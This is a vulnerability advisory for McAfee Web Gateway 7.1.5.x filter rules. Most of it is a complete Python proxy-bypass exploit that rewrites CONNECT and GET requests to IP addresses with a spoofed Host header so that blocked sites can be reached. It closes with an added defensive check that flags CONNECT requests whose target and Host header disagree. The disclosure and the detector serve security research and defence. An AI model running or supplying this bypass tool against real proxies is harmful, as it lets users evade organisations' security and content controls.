Release date: 2012-04-16
Updated on: 2012-04-17
Affected Systems:
McAfee Web Gateway 7.1.5.2
McAfee Web Gateway 7.1.5.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53015
The McAfee Web Gateway device provides comprehensive security protection for Web 2.0 traffic.
McAfee Web Gateway has a security vulnerability in its implementation of filter rules. A successful attack allows an attacker to bypass certain security restrictions.
<* Source: Gabriel Menezes Nunes (gab.mnunes@gmail.com) *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
Gabriel Menezes Nunes (gab.mnunes@gmail.com) provides the following test method:
import socket, struct, sys, time
from threading import Thread

# The timeOut can be changed if the proxy is slow.
# Tested in GMail, Facebook, Youtube and several blocked sites.
# The proxy gets the Host field of the HTTP header and does not verify anything else.
# It trusts the HTTP header, which can be modified by the attacker.
timeOut = 0.8
isGet = 0
hostNameG = ""
pacoteGet = ""
port = 8080  # Listening port
proxyAddr = "vulnerableProxy.com"  # vulnerable proxy
proxyPort = 8080  # proxy port

def handle(client, globalSock):
    client.settimeout(timeOut)
    global hostNameG
    while 1:
        dados = ""
        tam = 0
        while 1:
            try:
                dados2 = client.recv(1024)
                tam = tam + len(dados2)
                dados = dados + dados2
            except socket.timeout:
                break
        dd = dados.find("CONNECT")  # if the packet is a CONNECT METHOD
        if dd != -1:
            dd2 = dados.find(":")
            hostName = dados[dd + 8:dd2]
            ipAddr = socket.gethostbyname(hostName)  # changing the method to connect to the ip address, not the dns domain
            pacote = dados
            hostHeader = "Host: " + hostName
            pacote = pacote.replace(hostHeader, "Host: www.uol.com.br")  # changing the host field with a value that is accepted by the proxy
            pacote = pacote.replace(hostName, ipAddr)  # changing domain for ip
            dados = pacote
        getd = dados.find("GET ")
        getd2 = dados.find("//")
        getd3 = dados.find("/", getd2 + 2)
        hostName = dados[getd2 + 2:getd3]
        if getd != -1:
            globalSock.close()
            globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            globalSock.connect((proxyAddr, proxyPort))
            globalSock.settimeout(timeOut)
            getd2 = dados.find("//")
            getd3 = dados.find("/", getd2 + 2)
            hostName = dados[getd2 + 2:getd3]
            proxyAuth = ""
            proxyAuthN = dados.find("Proxy-Authorization:")
            if proxyAuthN != -1:
                proxyAuthNN = dados.find("\r\n", proxyAuthN)
                proxyAuth = dados[proxyAuthN:proxyAuthNN]
            ipAddr = socket.gethostbyname(hostName)
            info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n"
            if proxyAuthN != -1:
                info += proxyAuth + "\r\n"
            info += "Host: www.uol.com.br\r\n"
            globalSock.send(info)
            tam = 0
            gdata = ""
            while 1:
                try:
                    gdata2 = globalSock.recv(1024)
                    tam = tam + len(gdata2)
                    gdata = gdata + gdata2
                    if len(gdata2) == 0:
                        break
                except socket.timeout:
                    break
        globalSock.send(dados)
        tam = 0
        gdata = ""
        while 1:
            try:
                gdata2 = globalSock.recv(1024)
                if len(gdata2) > 0:
                    client.send(gdata2)
                tam = tam + len(gdata2)
                gdata = gdata + gdata2
                if len(gdata2) == 0:
                    break
            except socket.timeout:
                break

print 'proxy bypass'
print 'by Gabriel Menezes Nunes'
print 'Tested on McAfee Web Gateway 7 and Squid proxy'
sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'attacked Proxy :',
print proxyAddr
print 'listening on ',
print port
sockzao.bind(("", port))
sockzao.listen(6)
while 1:
    print 'Waiting for connections'
    client, address = sockzao.accept()
    print 'client connected'
    print address
    globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    globalSock.connect((proxyAddr, proxyPort))
    globalSock.settimeout(timeOut)
    t = Thread(target=handle, args=(client, globalSock,))
    t.start()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
McAfee
------
Currently, the vendor has not provided a patch or upgrade. We recommend that users of the software check the vendor's homepage for the latest version:
http://www.mcafee.com/
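
Detection check:
The test method's comments say the proxy decides on the Host header and verifies nothing else. The check below is an added example, not part of the original advisory or the reporter's code: it flags CONNECT requests whose target disagrees with the Host header. The function names, finding labels and sample requests are constructed for illustration.

```python
import ipaddress

# Constructed sample requests (documentation-range addresses and example domains).
SAMPLES = {
    "consistent": b"CONNECT mail.example.com:443 HTTP/1.1\r\nHost: mail.example.com:443\r\n\r\n",
    "mismatch": b"CONNECT 203.0.113.10:80 HTTP/1.1\r\nHost: allowed.example.org\r\n\r\n",
    "ip_only": b"CONNECT 203.0.113.10:443 HTTP/1.1\r\nHost: 203.0.113.10:443\r\n\r\n",
}

def parse_request(raw):
    """Return (method, target, headers) parsed from a raw HTTP/1.x request head."""
    lines = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")
    parts = lines[0].split()
    if len(parts) != 3:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # keep every occurrence so duplicated Host headers are visible
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return parts[0].upper(), parts[1], headers

def host_of(authority):
    """Strip the port from 'host:port' or '[v6]:port' and lowercase the host."""
    if authority.startswith("["):
        return authority[1:authority.find("]")].lower()
    return authority.rsplit(":", 1)[0].lower() if ":" in authority else authority.lower()

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def check_connect(raw):
    """Return findings for one request; an empty list means target and Host agree."""
    method, target, headers = parse_request(raw)
    if method != "CONNECT":
        return []
    hosts = headers.get("host", [])
    if len(hosts) != 1:
        return ["missing-or-duplicate-host"]
    target_host, header_host = host_of(target), host_of(hosts[0])
    findings = []
    if target_host != header_host:
        findings.append("host-target-mismatch")
        if is_ip_literal(target_host) and not is_ip_literal(header_host):
            findings.append("ip-target-with-named-host")
    return findings

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, check_connect(raw))
```

A filter that evaluates the CONNECT target itself, rather than the Host header, does not depend on the two values agreeing.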